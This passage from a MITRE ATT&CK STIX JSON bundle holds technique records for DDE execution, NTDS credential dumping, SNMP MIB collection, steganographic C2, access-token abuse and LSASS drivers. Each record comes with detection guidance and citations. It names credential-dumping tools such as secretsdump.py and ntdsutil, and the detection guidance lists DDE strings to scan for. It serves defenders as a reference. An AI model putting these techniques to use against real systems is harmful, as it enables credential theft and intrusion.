"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1587", "external_id": "T1587"}, {"source_name": "Mandiant APT1", "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"}, {"source_name": "Kaspersky Sofacy", "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/"}, {"source_name": "Bitdefender StrongPity June 2020", "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.", "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf"}, {"source_name": "Talos Promethium June 2020", "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020.", "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html"}, {"source_name": "Splunk Kovar Certificates 2017", "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.", "url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Dynamic Data Exchange", "description": "Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)\n\nAdversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "OLE and Office Open XML files can be scanned for \u2018DDEAUTO', \u2018DDE\u2019, and other strings indicative of DDE execution. (Citation: NVisio Labs DDE Detection Oct 2017)\n\nMonitor for Microsoft Office applications loading DLLs and other modules not typically associated with the application.\n\nMonitor for spawning of unusual processes (such as cmd.exe) from Microsoft Office applications.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1173", "external_id": "T1173"}, {"source_name": "BleepingComputer DDE Disabled in Word Dec 2017", "description": "Cimpanu, C. (2017, December 15). Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks. Retrieved December 19, 2017.", "url": "https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/"}, {"source_name": "Microsoft ADV170021 Dec 2017", "description": "Microsoft. (2017, December 12). ADV170021 - Microsoft Office Defense in Depth Update. Retrieved February 3, 2018.", "url": "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021"}, {"source_name": "Microsoft DDE Advisory Nov 2017", "description": "Microsoft. (2017, November 8). Microsoft Security Advisory 4053440 - Securely opening Microsoft Office documents that contain Dynamic Data Exchange (DDE) fields. Retrieved November 21, 2017.", "url": "https://technet.microsoft.com/library/security/4053440"}, {"source_name": "SensePost PS DDE May 2016", "description": "El-Sherei, S. (2016, May 20). PowerShell, C-Sharp and DDE The Power Within. Retrieved November 22, 2017.", "url": "https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/"}, {"source_name": "Kettle CSV DDE Aug 2014", "description": "Kettle, J. (2014, August 29). Comma Separated Vulnerabilities. Retrieved November 22, 2017.", "url": "https://www.contextis.com/blog/comma-separated-vulnerabilities"}, {"source_name": "Enigma Reviving DDE Jan 2018", "description": "Nelson, M. (2018, January 29). Reviving DDE: Using OneNote and Excel for Code Execution. Retrieved February 3, 2018.", "url": "https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee"}, {"source_name": "SensePost MacroLess DDE Oct 2017", "description": "Stalmans, E., El-Sherei, S. (2017, October 9). Macro-less Code Exec in MSWord. Retrieved November 21, 2017.", "url": "https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/"}, {"source_name": "NVisio Labs DDE Detection Oct 2017", "description": "NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.", "url": "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-07-28T14:41:38.908Z", "name": "NTDS", "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)\n\nIn addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)\n\nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Ed Williams, Trustwave, SpiderLabs"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Access to Domain Controller or backup"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", "created": "2020-02-11T18:42:35.572Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1003/003", "external_id": "T1003.003"}, {"source_name": "Metcalf 2015", "description": "Metcalf, S. (2015, January 19). Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest. Retrieved February 3, 2015.", "url": "http://adsecurity.org/?p=1275"}, {"source_name": "Wikipedia Active Directory", "description": "Wikipedia. (2018, March 10). Active Directory. Retrieved April 11, 2018.", "url": "https://en.wikipedia.org/wiki/Active_Directory"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "SNMP (MIB Dump)", "description": "Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.\n\nAdversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", "created": "2020-10-19T23:51:05.953Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1602/001", "external_id": "T1602.001"}, {"source_name": "SANS Information Security Reading Room Securing SNMP Securing SNMP", "description": "Michael Stump. (2003). Information Security Reading Room Securing SNMP: A Look atNet-SNMP (SNMPv3). Retrieved October 19, 2020.", "url": "https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051"}, {"source_name": "US-CERT-TA18-106A", "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"}, {"source_name": "Cisco Blog Legacy Device Attacks", "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"}, {"source_name": "Cisco Advisory SNMP v3 Authentication Vulnerabilities", "description": "Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020.", "url": "https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Steganography", "description": "Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", "created": "2020-03-15T00:37:58.963Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1001/002", "external_id": "T1001.002"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Malicious Link", "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", "created": "2020-03-11T14:43:31.706Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1204/001", "external_id": "T1204.001"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:13.531Z", "name": "Module Firmware", "description": "Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment. \n\nThis technique is similar to [System Firmware](https://attack.mitre.org/techniques/T0857), but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices. (Citation: Daniel Peck, Dale Peterson January 2009) \n\nAn easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following: (Citation: Daniel Peck, Dale Peterson January 2009) \n\n* Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time. \n* Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return. \n* Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator. \n* A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise. \n* Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-ics-attack", "phase_name": "impair-process-control"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Operational Databases: Device Alarm", "Application Log: Application Log Content", "Network Traffic: Network Traffic Content", "Firmware: Firmware Modification"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0839", "external_id": "T0839"}, {"source_name": "Daniel Peck, Dale Peterson January 2009", "description": "Daniel Peck, Dale Peterson 2009, January 28 Leveraging Ethernet Card Vulnerabilities in Field Devices Retrieved. 2017/12/19 ", "url": "https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-28T15:43:18.080Z", "name": "Application Access Token", "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) \n\nOAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim\u2019s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured \u2013 for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)\n\nDirect API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. For example, in AWS environments, an adversary who compromises a user\u2019s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Shailesh Tiwary (Indian Army)", "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)", "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)", "Mark Wee", "Ian Davila, Tidal Cyber", "Dylan Silva, AWS Security", "Jack Burns, HubSpot", "Blake Strom, Microsoft Threat Intelligence", "Pawel Partyka, Microsoft Threat Intelligence"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs. Additionally, administrators should review logs for calls to the AWS Security Token Service (STS) and usage of GCP service accounts in order to identify anomalous actions.(Citation: AWS Logging IAM Calls)(Citation: GCP Monitoring Service Account Usage)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Office 365", "SaaS", "Google Workspace", "Containers", "IaaS", "Azure AD"], "x_mitre_version": "1.6", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["System Access Controls"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51", "created": "2020-01-30T17:37:22.261Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1550/001", "external_id": "T1550.001"}, {"source_name": "Crowdstrike AWS User Federation Persistence", "description": " Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries Can Persist with AWS User Federation. Retrieved March 10, 2023.", "url": "https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/"}, {"source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019", "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.", "url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/"}, {"source_name": "AWS Logging IAM Calls", "description": "AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail. Retrieved April 1, 2022.", "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html"}, {"source_name": "AWS Temporary Security Credentials", "description": "AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.", "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html"}, {"source_name": "Microsoft Identity Platform Access 2019", "description": "Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.", "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens"}, {"source_name": "Google Cloud Service Account Credentials", "description": "Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022.", "url": "https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials"}, {"source_name": "GCP Monitoring Service Account Usage", "description": "Google Cloud. (2022, March 31). Monitor usage patterns for service accounts and keys . Retrieved April 1, 2022.", "url": "https://cloud.google.com/iam/docs/service-account-monitoring"}, {"source_name": "okta", "description": "okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.", "url": "https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen"}, {"source_name": "Rhino Security Labs Enumerating AWS Roles", "description": "Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through \u2018AssumeRole\u2019. Retrieved April 1, 2022.", "url": "https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration"}, {"source_name": "Staaldraad Phishing with OAuth 2017", "description": "Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.", "url": "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "LSASS Driver", "description": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)\n\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Vincent Le Toux"], "x_mitre_deprecated": false, "x_mitre_detection": "With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)\n\nUtilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["SYSTEM", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4", "created": "2020-01-24T18:38:55.801Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/008", "external_id": "T1547.008"}, {"source_name": "Microsoft LSA Protection Mar 2014", "description": "Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017.", "url": "https://technet.microsoft.com/library/dn408187.aspx"}, {"source_name": "Microsoft DLL Security", "description": "Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November 27, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx"}, {"source_name": "Microsoft Security Subsystem", "description": "Microsoft. (n.d.). Security Subsystem Architecture. Retrieved November 27, 2017.", "url": "https://technet.microsoft.com/library/cc961760.aspx"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-08-14T15:53:00.999Z", "name": "Service Execution", "description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).\n\n[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and sc.exe can accept remote servers as arguments and may be used to conduct remote execution.\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", "created": "2020-03-10T18:33:36.159Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1569/002", "external_id": "T1569.002"}, {"source_name": "Microsoft Service Control Manager", "description": "Microsoft. (2018, May 31). Service Control Manager. Retrieved March 28, 2020.", "url": "https://docs.microsoft.com/windows/win32/services/service-control-manager"}, {"source_name": "Russinovich Sysinternals", "description": "Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-03-29T15:42:13.499Z", "name": "Cloud Accounts", "description": "Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nService or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices.\n\nAn adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass 